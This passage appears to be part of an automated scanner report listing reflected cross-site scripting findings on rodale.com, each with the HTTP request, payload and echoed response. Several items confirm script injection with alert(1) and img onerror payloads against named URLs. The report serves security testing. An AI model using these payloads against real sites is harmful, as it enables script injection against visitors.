<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page rodalecom-team31adc"><a>8a1440e7f35 node node-958">
...[SNIP]...

2.199. http://www.rodale.com/rodalecom-team [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /rodalecom-team

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d22ec"><a>9c968f0e2e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /rodalecom-team?d22ec"><a>9c968f0e2e2=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:54 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:56 GMT
Date: Thu, 10 Mar 2011 17:06:56 GMT
Content-Length: 29104
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/rodalecom-team?d22ec"><a>9c968f0e2e2=1" title="Register" class="moreLink">
...[SNIP]...

2.200. http://www.rodale.com/rss-feeds [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /rss-feeds

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3dc0"><a>efe5f9be3e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /rss-feedsb3dc0"><a>efe5f9be3e1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:49 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1799
Expires: Thu, 10 Mar 2011 17:37:51 GMT
Date: Thu, 10 Mar 2011 17:07:52 GMT
Content-Length: 22443
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page rss-feedsb3dc0"><a>efe5f9be3e1 node node-958">
...[SNIP]...

2.201. http://www.rodale.com/rss-feeds [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /rss-feeds

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4c5e"><a>b65b7d6d1a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /rss-feeds?e4c5e"><a>b65b7d6d1a9=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:56 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:58 GMT
Date: Thu, 10 Mar 2011 17:06:58 GMT
Content-Length: 24643
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/rss-feeds?e4c5e"><a>b65b7d6d1a9=1" title="Register" class="moreLink">
...[SNIP]...

2.202. http://www.rodale.com/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 837bc"><a>082b5ca454b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /rss.xml837bc"><a>082b5ca454b HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:04 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:35:04 GMT
Date: Thu, 10 Mar 2011 17:05:04 GMT
Content-Length: 22437
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page rss.xml837bc"><a>082b5ca454b node node-958">
...[SNIP]...

2.203. http://www.rodale.com/search/google_appliance [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /search/google_appliance

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70f00"><a>d72c0f053f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search70f00"><a>d72c0f053f0/google_appliance HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:49 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:51 GMT
Date: Thu, 10 Mar 2011 17:06:51 GMT
Content-Length: 22515
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page search70f00"><a>d72c0f053f0 search70f00">
...[SNIP]...

2.204. http://www.rodale.com/search/google_appliance [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /search/google_appliance

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 581c9"><script>alert(1)</script>0392f7bba55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/google_appliance581c9"><script>alert(1)</script>0392f7bba55 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:28 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:29 GMT
Date: Thu, 10 Mar 2011 17:07:29 GMT
Content-Length: 21705
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="/search/google_appliance581c9"><script>alert(1)</script>0392f7bba55" class="filters dottedLine">
...[SNIP]...

2.205. http://www.rodale.com/search/google_appliance [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /search/google_appliance

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aee6e"><script>alert(1)</script>a003685982a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/google_appliance?aee6e"><script>alert(1)</script>a003685982a=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:47 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:48 GMT
Date: Thu, 10 Mar 2011 17:06:48 GMT
Content-Length: 21127
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/search/google_appliance?aee6e"><script>alert(1)</script>a003685982a=1" title="Register" class="moreLink">
...[SNIP]...

2.206. http://www.rodale.com/search/google_appliance/BPA [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /search/google_appliance/BPA

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f982"><a>0a4677dd94e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search8f982"><a>0a4677dd94e/google_appliance/BPA HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:34 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:36 GMT
Date: Thu, 10 Mar 2011 17:06:36 GMT
Content-Length: 22525
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page search8f982"><a>0a4677dd94e search8f982">
...[SNIP]...

2.207. http://www.rodale.com/search/google_appliance/BPA [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /search/google_appliance/BPA

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dcbbf'><img%20src%3da%20onerror%3dalert(1)>dc9cad8a6ab was submitted in the REST URL parameter 2. This input was echoed as dcbbf'><img src=a onerror=alert(1)>dc9cad8a6ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/google_appliancedcbbf'><img%20src%3da%20onerror%3dalert(1)>dc9cad8a6ab/BPA HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:25 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:26 GMT
Date: Thu, 10 Mar 2011 17:07:26 GMT
Content-Length: 22757
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href='/search/google_appliancedcbbf'><img src=a onerror=alert(1)>dc9cad8a6ab/BPA?filter=prevention.com'>
...[SNIP]...

2.208. http://www.rodale.com/search/google_appliance/BPA [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /search/google_appliance/BPA

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86a68"><script>alert(1)</script>a1e7f72e2ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/google_appliance86a68"><script>alert(1)</script>a1e7f72e2ef/BPA HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:12 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:13 GMT
Date: Thu, 10 Mar 2011 17:07:13 GMT
Content-Length: 21731
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="/search/google_appliance86a68"><script>alert(1)</script>a1e7f72e2ef/BPA" class="filters dottedLine">
...[SNIP]...

2.209. http://www.rodale.com/search/google_appliance/BPA [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /search/google_appliance/BPA

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78c7d"><script>alert(1)</script>55828201eca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/google_appliance/BPA78c7d"><script>alert(1)</script>55828201eca HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:28 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:30 GMT
Date: Thu, 10 Mar 2011 17:07:30 GMT
Content-Length: 21834
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/search/google_appliance/BPA78c7d"><script>alert(1)</script>55828201eca" title="Register" class="moreLink">
...[SNIP]...

2.210. http://www.rodale.com/search/google_appliance/BPA [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /search/google_appliance/BPA

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e86ad'%3b9bf084198b4 was submitted in the REST URL parameter 3. This input was echoed as e86ad';9bf084198b4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search/google_appliance/BPAe86ad'%3b9bf084198b4 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:31 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1799
Expires: Thu, 10 Mar 2011 17:37:32 GMT
Date: Thu, 10 Mar 2011 17:07:33 GMT
Content-Length: 21623
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
;
var axel = Math.random() + '';
var ord = axel * 1000000000000000000;
var topic = dfpTopic;
var sbtpc = dfpSubTopic;
var dfpCat= '';
var cat = dfpCat;
var dfpKeyword = 'BPAe86ad';9bf084198b4';
var siteName = 'rodale';
var dfpTile='1';
var tile = dfpTile;
var useCAS = 'N';
// ]]>
...[SNIP]...

2.211. http://www.rodale.com/search/google_appliance/BPA [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /search/google_appliance/BPA

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3acce"><script>alert(1)</script>79f41b9b7d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/google_appliance/BPA?3acce"><script>alert(1)</script>79f41b9b7d9=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:31 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:34 GMT
Date: Thu, 10 Mar 2011 17:06:34 GMT
Content-Length: 29285
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/search/google_appliance/BPA?3acce"><script>alert(1)</script>79f41b9b7d9=1" title="Register" class="moreLink">
...[SNIP]...

2.212. http://www.rodale.com/search/google_appliance/Cleaning [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /search/google_appliance/Cleaning

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d248"><a>d6c347d5f7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search1d248"><a>d6c347d5f7d/google_appliance/Cleaning HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:37 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:40 GMT
Date: Thu, 10 Mar 2011 17:06:40 GMT
Content-Length: 22535
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page search1d248"><a>d6c347d5f7d search1d248">
...[SNIP]...

2.213. http://www.rodale.com/search/google_appliance/Cleaning [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /search/google_appliance/Cleaning

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87aab"><script>alert(1)</script>093924cc8a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/google_appliance87aab"><script>alert(1)</script>093924cc8a2/Cleaning HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:15 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:16 GMT
Date: Thu, 10 Mar 2011 17:07:16 GMT
Content-Length: 21761
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="/search/google_appliance87aab"><script>alert(1)</script>093924cc8a2/Cleaning" class="filters dottedLine">
...[SNIP]...

2.214. http://www.rodale.com/search/google_appliance/Cleaning [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /search/google_appliance/Cleaning

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single